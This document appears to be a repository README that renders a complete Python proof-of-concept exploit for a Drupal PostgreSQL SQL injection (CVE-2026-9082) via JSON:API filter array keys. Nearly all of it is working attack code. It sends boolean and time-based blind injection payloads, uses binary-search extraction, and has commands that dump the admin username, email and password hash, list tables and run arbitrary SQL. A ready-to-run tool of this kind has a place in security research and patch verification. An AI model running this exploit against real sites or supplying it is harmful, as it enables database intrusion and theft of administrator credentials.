README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-9082 - Drupal Core PostgreSQL SQL Injection PoC
This script exploits a SQL injection vulnerability in Drupal's PostgreSQL
Entity Query Condition handler (core/modules/pgsql/src/EntityQuery/Condition.php).
The translateCondition() method uses user-controlled array keys from JSON:API
filter values to construct SQL placeholder names without sanitization.
PDO only parses alphanumeric+underscore characters as placeholder names,
so any suffix after the first ')' becomes literal SQL in the query.
IMPORTANT: PDO emulated prepares (enabled by default in Drupal/PostgreSQL)
respects -- SQL comments during placeholder tokenization. The injection
must therefore avoid -- and instead balance parentheses explicitly so that
all :placeholder tokens remain visible to PDO.
Affects: Drupal 8.0 - 11.3.9 with PostgreSQL backend
Fixed in: 11.3.10, 11.2.12, 10.6.9, 10.5.10
Advisory: SA-CORE-2026-004
CVE: CVE-2026-9082
Dependencies:
pip install requests rich
Usage:
python3 CVE-2026-9082.py -u https://target.com --check
python3 CVE-2026-9082.py -u https://target.com --version
python3 CVE-2026-9082.py -u https://target.com --admin
python3 CVE-2026-9082.py -u https://target.com --query "SELECT current_user"
Author: 7h30th3r0n3
License: For authorized security testing and educational purposes only.
"""
import argparse
import sys
import time
from urllib.parse import quote
import requests
import requests.packages.urllib3
from rich.console import Console
from rich.table import Table
from rich.prompt import Prompt
requests.packages.urllib3.disable_warnings()
console = Console()
DEFAULT_TIMEOUT = 30
DEFAULT_SLEEP = 5
SLEEP_THRESHOLD = 3
CANARY_A = "CVE20269082a"
CANARY_B = "CVE20269082b"
CANARY_C = "CVE20269082c"
# ------------------- URL HELPERS -------------------
def _build_qs(field, injection_key):
"""Build a properly encoded query string for the JSON:API filter.
The injection key must be URL-encoded inside the bracket delimiters
so that PHP's $_GET parser receives the raw key intact as an array
key. Brackets for the outer filter structure use %5B / %5D.
"""
ek = quote(injection_key, safe="")
return (
f"filter%5Bsqli%5D%5Bcondition%5D%5Bpath%5D={quote(field, safe='')}"
f"&filter%5Bsqli%5D%5Bcondition%5D%5Boperator%5D=IN"
f"&filter%5Bsqli%5D%5Bcondition%5D%5Bvalue%5D%5B0%5D={CANARY_A}"
f"&filter%5Bsqli%5D%5Bcondition%5D%5Bvalue%5D%5B1%5D={CANARY_B}"
f"&filter%5Bsqli%5D%5Bcondition%5D%5Bvalue%5D%5B{ek}%5D={CANARY_C}"
)
# ------------------- RECONNAISSANCE -------------------
def check_drupal(base_url, session, timeout):
"""Verify that the target runs Drupal with JSON:API enabled."""
console.print("\n[bold cyan]🔍 Checking target for Drupal + JSON:API...[/bold cyan]")
try:
resp = session.get(f"{base_url}/jsonapi", timeout=timeout)
if resp.status_code == 200 and "jsonapi" in resp.text:
console.print("[green]✔ JSON:API endpoint found and active[/green]")
return True
except requests.RequestException:
pass
try:
resp = session.get(base_url, timeout=timeout)
generator = resp.headers.get("X-Generator", "").lower()
if "drupal" in generator or "drupal" in resp.text.lower():
console.print("[green]✔ Drupal detected[/green]")
console.print("[yellow]⚠ JSON:API endpoint not responding — may be disabled[/yellow]")
return True
except requests.RequestException as exc:
console.print(f"[red]❌ Connection error: {exc}[/red]")
return False
console.print("[red]❌ Could not confirm Drupal installation[/red]")
return False
def discover_resource_types(base_url, session, timeout):
"""Discover JSON:API resource types with a title field."""
console.print("[bold cyan]📡 Discovering JSON:API resource types...[/bold cyan]")
try:
resp = session.get(f"{base_url}/jsonapi", timeout=timeout)
if resp.status_code == 200:
data = resp.json()
types = [
key.replace("--", "/")
for key in data.get("links", {})
if key.startswith("node--")
]
if types:
console.print(f"[green]✔ Found node types: {', '.join(types)}[/green]")
return types
except (requests.RequestException, ValueError):
pass
candidates = ["node/article", "node/page", "node/basic_page"]
found = []
for rt in candidates:
try:
resp = session.get(f"{base_url}/jsonapi/{rt}", timeout=timeout)
if resp.status_code == 200:
found.append(rt)
console.print(f"[green]✔ Found resource type: {rt}[/green]")
except requests.RequestException:
continue
return found
# ------------------- INJECTION ENGINE -------------------
def send_injection(base_url, resource_type, field, injection_key, session, timeout):
"""Send a crafted JSON:API request with the injection payload.
Uses pre-encoded query string and overrides the prepared URL
to prevent the requests library from re-encoding brackets.
"""
raw_url = (
f"{base_url}/jsonapi/{resource_type}"
f"?{_build_qs(field, injection_key)}"
)
req = requests.Request("GET", raw_url, headers=session.headers)
prepared = session.prepare_request(req)
prepared.url = raw_url
start = time.time()
try:
resp = session.send(prepared, timeout=timeout, verify=session.verify)
except requests.Timeout:
return None, time.time() - start
except requests.RequestException:
return None, 0.0
return resp, time.time() - start
# ------------------- DETECTION -------------------
def detect_time_based(base_url, rt, session, timeout, sleep_time):
"""Time-based blind detection using pg_sleep() with CASE WHEN."""
console.print(f"[bold cyan]⏱️ Time-based probe (pg_sleep({sleep_time}))...[/bold cyan]")
_, baseline = send_injection(base_url, rt, "title", "2", session, timeout)
console.print(f" Baseline response: [yellow]{baseline:.2f}s[/yellow]")
key = (
f"1))/**/OR/**/(SELECT/**/CASE/**/WHEN/**/current_user/**/IS/**/NOT/**/NULL"
f"/**/THEN/**/pg_sleep({sleep_time})/**/ELSE/**/pg_sleep(0)"
f"/**/END)::text=((chr(49)"
)
_, injected = send_injection(base_url, rt, "title", key, session, timeout)
console.print(f" Injected response: [yellow]{injected:.2f}s[/yellow]")
delay = injected - baseline
if delay >= SLEEP_THRESHOLD:
console.print(f"\n[bold green]✔ VULNERABLE — time-based confirmed (+{delay:.1f}s delay)[/bold green]")
console.print(f"[green] Resource type : {rt}[/green]")
console.print(f"[green] Backend : PostgreSQL[/green]")
return True
return False
def detect_boolean_based(base_url, rt, session, timeout):
"""Boolean-based detection: compare OR TRUE vs OR FALSE row counts."""
console.print("[bold cyan]🔀 Boolean-based probe (OR TRUE vs OR FALSE)...[/bold cyan]")
resp_true, _ = send_injection(
base_url, rt, "title",
"1))/**/OR/**/TRUE/**/OR/**/1=1/**/OR/**/((1=1",
session, timeout,
)
resp_false, _ = send_injection(
base_url, rt, "title",
"1))/**/OR/**/FALSE/**/AND/**/1=2/**/OR/**/((1=2",
session, timeout,
)
if resp_true is None or resp_false is None:
return False
try:
n_true = len(resp_true.json().get("data", []))
n_false = len(resp_false.json().get("data", []))
if n_true > n_false:
console.print(f"\n[bold green]✔ VULNERABLE — boolean-based confirmed[/bold green]")
console.print(f"[green] OR TRUE → {n_true} results[/green]")
console.print(f"[green] OR FALSE → {n_false} results[/green]")
console.print(f"[green] Resource type : {rt}[/green]")
return True
except (ValueError, AttributeError):
pass
return False
def test_vulnerability(base_url, session, timeout, sleep_time):
"""Run detection probes and return (vulnerable: bool, resource_type: str)."""
console.print("\n[bold]🚀 Testing for CVE-2026-9082...[/bold]")
resource_types = discover_resource_types(base_url, session, timeout)
if not resource_types:
console.print("[red]❌ No JSON:API resource types found — cannot test[/red]")
return False, None
for rt in resource_types:
console.print(f"\n[bold cyan]📌 Probing {rt}...[/bold cyan]")
if detect_boolean_based(base_url, rt, session, timeout):
return True, rt
if detect_time_based(base_url, rt, session, timeout, sleep_time):
return True, rt
console.print("\n[red]❌ Target does not appear vulnerable[/red]")
console.print("[dim] (may not use PostgreSQL, or JSON:API is restricted)[/dim]")
return False, None
# ------------------- DATA EXTRACTION -------------------
def extract_char_time(base_url, rt, sql, pos, session, timeout, sleep_time=2):
"""Extract one character via time-based binary search."""
lo, hi = 32, 126
while lo < hi:
mid = (lo + hi) // 2
key = (
f"1))/**/OR/**/(SELECT/**/CASE/**/WHEN/**/"
f"ASCII(SUBSTR(({sql}),{pos},1))>{mid}/**/"
f"THEN/**/pg_sleep({sleep_time})/**/ELSE/**/pg_sleep(0)"
f"/**/END)::text=((chr(49)"
)
_, elapsed = send_injection(base_url, rt, "title", key, session, timeout)
if elapsed >= sleep_time - 0.5:
lo = mid + 1
else:
hi = mid
return chr(lo) if 32 <= lo <= 126 else None
def extract_char_bool(base_url, rt, sql, pos, session, timeout):
"""Extract one character via boolean-based binary search."""
lo, hi = 32, 126
while lo < hi:
mid = (lo + hi) // 2
key = (
f"1))/**/OR/**/(SELECT/**/ASCII(SUBSTR("
f"({sql}),{pos},1))>{mid})/**/AND/**/((1=1"
)
resp, _ = send_injection(base_url, rt, "title", key, session, timeout)
if resp is None:
hi = mid
continue
try:
n = len(resp.json().get("data", []))
if n > 0:
lo = mid + 1
else:
hi = mid
except (ValueError, AttributeError):
hi = mid
return chr(lo) if 32 <= lo <= 126 else None
def extract_string(base_url, rt, sql, session, timeout, method="time",
max_len=200, sleep_time=2):
"""Extract a full string from the database character by character."""
result = ""
trailing_spaces = 0
for pos in range(1, max_len + 1):
if method == "time":
ch = extract_char_time(base_url, rt, sql, pos, session, timeout, sleep_time)
else:
ch = extract_char_bool(base_url, rt, sql, pos, session, timeout)
if ch is None or ch == "\x00":
break
result += ch
if ch == " ":
trailing_spaces += 1
if trailing_spaces >= 3:
result = result.rstrip()
break
else:
trailing_spaces = 0
console.print(f"\r[bold green]✔ Extracting:[/bold green] {result}", end="")
console.print()
return result
# ------------------- HIGH-LEVEL COMMANDS -------------------
def cmd_version(base_url, rt, session, timeout, method, sleep_time):
"""Extract PostgreSQL version."""
console.print("\n[bold cyan]🐘 Extracting PostgreSQL version...[/bold cyan]")
v = extract_string(base_url, rt, "SELECT/**/version()", session, timeout,
method, sleep_time=sleep_time)
console.print(f"\n[bold green]✔ PostgreSQL version:[/bold green] {v}")
return v
def cmd_dbinfo(base_url, rt, session, timeout, method, sleep_time):
"""Extract database user and name."""
console.print("\n[bold cyan]🗄️ Extracting database info...[/bold cyan]")
user = extract_string(base_url, rt, "SELECT/**/current_user", session,
timeout, method, sleep_time=sleep_time)
console.print(f"[bold green]✔ Database user:[/bold green] {user}")
db = extract_string(base_url, rt, "SELECT/**/current_database()", session,
timeout, method, sleep_time=sleep_time)
console.print(f"[bold green]✔ Database name:[/bold green] {db}")
return user, db
def cmd_admin(base_url, rt, session, timeout, method, sleep_time):
"""Extract Drupal admin (uid=1) credentials."""
console.print("\n[bold cyan]🔐 Extracting Drupal admin (uid=1) credentials...[/bold cyan]")
name = extract_string(
base_url, rt,
"SELECT/**/name/**/FROM/**/users_field_data/**/WHERE/**/uid=1",
session, timeout, method, sleep_time=sleep_time,
)
mail = extract_string(
base_url, rt,
"SELECT/**/mail/**/FROM/**/users_field_data/**/WHERE/**/uid=1",
session, timeout, method, sleep_time=sleep_time,
)
passwd = extract_string(
base_url, rt,
"SELECT/**/pass/**/FROM/**/users_field_data/**/WHERE/**/uid=1",
session, timeout, method, max_len=100, sleep_time=sleep_time,
)
table = Table(title="Drupal Admin Credentials")
table.add_column("Field", style="cyan")
table.add_column("Value", style="green")
table.add_row("Username", name)
table.add_row("Email", mail)
table.add_row("Password hash", passwd)
console.print(table)
return name, mail, passwd
def cmd_tables(base_url, rt, session, timeout, method, sleep_time, limit=20):
"""List database tables."""
console.print(f"\n[bold cyan]📋 Extracting table names (limit {limit})...[/bold cyan]")
sql = (
f"SELECT/**/string_agg(tablename,',')"
f"/**/FROM/**/(SELECT/**/tablename/**/FROM/**/pg_tables"
f"/**/WHERE/**/schemaname='public'"
f"/**/ORDER/**/BY/**/tablename/**/LIMIT/**/{limit})/**/AS/**/t"
)
raw = extract_string(base_url, rt, sql, session, timeout, method,
max_len=2000, sleep_time=sleep_time)
if raw:
tables = [t.strip() for t in raw.split(",")]
table = Table(title="Database Tables")
table.add_column("#", style="dim")
table.add_column("Table Name", style="green")
for i, t in enumerate(tables, 1):
table.add_row(str(i), t)
console.print(table)
return tables
return []
def cmd_query(base_url, rt, sql_raw, session, timeout, method, sleep_time):
"""Execute a custom SQL extraction query."""
sql = sql_raw.replace(" ", "/**/")
console.print(f"\n[bold cyan]💉 Extracting custom query...[/bold cyan]")
result = extract_string(base_url, rt, sql, session, timeout, method,
sleep_time=sleep_time)
console.print(f"\n[bold green]✔ Result:[/bold green] {result}")
return result
# ------------------- MAIN -------------------
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-9082 — Drupal PostgreSQL SQL Injection PoC",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=(
"examples:\n"
" %(prog)s -u https://target.com --check\n"
" %(prog)s -u https://target.com --version\n"
" %(prog)s -u https://target.com --admin\n"
' %(prog)s -u https://target.com --query "SELECT current_user"\n'
),
)
parser.add_argument("-u", "--url", help="Target Drupal base URL")
parser.add_argument("--check", action="store_true",
help="Only check if target is vulnerable")
parser.add_argument("--version", action="store_true",
help="Extract PostgreSQL version")
parser.add_argument("--dbinfo", action="store_true",
help="Extract database user and name")
parser.add_argument("--admin", action="store_true",
help="Extract Drupal admin (uid=1) credentials")
parser.add_argument("--tables", action="store_true",
help="List database tables")
parser.add_argument("--query", help="Custom SQL query to extract")
parser.add_argument("-m", "--method", choices=["time", "bool"],
default="bool",
help="Extraction method (default: bool)")
parser.add_argument("-d", "--delay", type=int, default=DEFAULT_SLEEP,
help=f"Seconds for pg_sleep probe (default: {DEFAULT_SLEEP})")
parser.add_argument("--timeout", type=int, default=DEFAULT_TIMEOUT,
help=f"HTTP request timeout (default: {DEFAULT_TIMEOUT})")
parser.add_argument("--no-ssl-verify", action="store_true",
help="Skip TLS certificate verification")
args = parser.parse_args()
console.print(
"\n[bold white on blue] CVE-2026-9082 — Drupal PostgreSQL SQL Injection PoC [/bold white on blue]"
)
console.print("[dim] Affected: Drupal 8.0 – 11.3.9 | Vector: JSON:API filter array key injection[/dim]\n")
if not args.url:
console.print("[bold yellow]No URL provided — entering interactive mode[/bold yellow]\n")
url = Prompt.ask("🔗 Target Drupal URL")
sleep_time = int(Prompt.ask("⏱️ pg_sleep seconds for detection", default="5"))
timeout = int(Prompt.ask("🛑 HTTP timeout", default="30"))
method = Prompt.ask("📡 Extraction method", choices=["time", "bool"], default="bool")
action = Prompt.ask(
"🎯 Action",
choices=["check", "version", "dbinfo", "admin", "tables", "query"],
default="check",
)
custom_query = None
if action == "query":
custom_query = Prompt.ask("💉 SQL query to extract")
else:
url = args.url
sleep_time = args.delay
timeout = args.timeout
method = args.method
action = None
custom_query = args.query
url = url.rstrip("/")
verify_ssl = not args.no_ssl_verify if args.url else True
session = requests.Session()
session.verify = verify_ssl
session.headers.update({
"User-Agent": (
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/125.0.0.0 Safari/537.36"
),
"Accept": "application/vnd.api+json",
})
try:
if not check_drupal(url, session, timeout):
sys.exit(1)
vulnerable, rt = test_vulnerability(url, session, timeout, sleep_time)
if not vulnerable:
sys.exit(1)
if action:
if action == "check":
pass
elif action == "version":
cmd_version(url, rt, session, timeout, method, sleep_time)
elif action == "dbinfo":
cmd_dbinfo(url, rt, session, timeout, method, sleep_time)
elif action == "admin":
cmd_admin(url, rt, session, timeout, method, sleep_time)
elif action == "tables":
cmd_tables(url, rt, session, timeout, method, sleep_time)
elif action == "query" and custom_query:
cmd_query(url, rt, custom_query, session, timeout, method, sleep_time)
else:
if args.check:
pass
if args.version:
cmd_version(url, rt, session, timeout, method, sleep_time)
if args.dbinfo:
cmd_dbinfo(url, rt, session, timeout, method, sleep_time)
if args.admin:
cmd_admin(url, rt, session, timeout, method, sleep_time)
if args.tables:
cmd_tables(url, rt, session, timeout, method, sleep_time)
if args.query:
cmd_query(url, rt, args.query, session, timeout, method, sleep_time)
console.print("\n[bold green]✔ Done.[/bold green]")
except KeyboardInterrupt:
console.print("\n[yellow]⚠ Interrupted by user[/yellow]")
sys.exit(130)
if __name__ == "__main__":
main()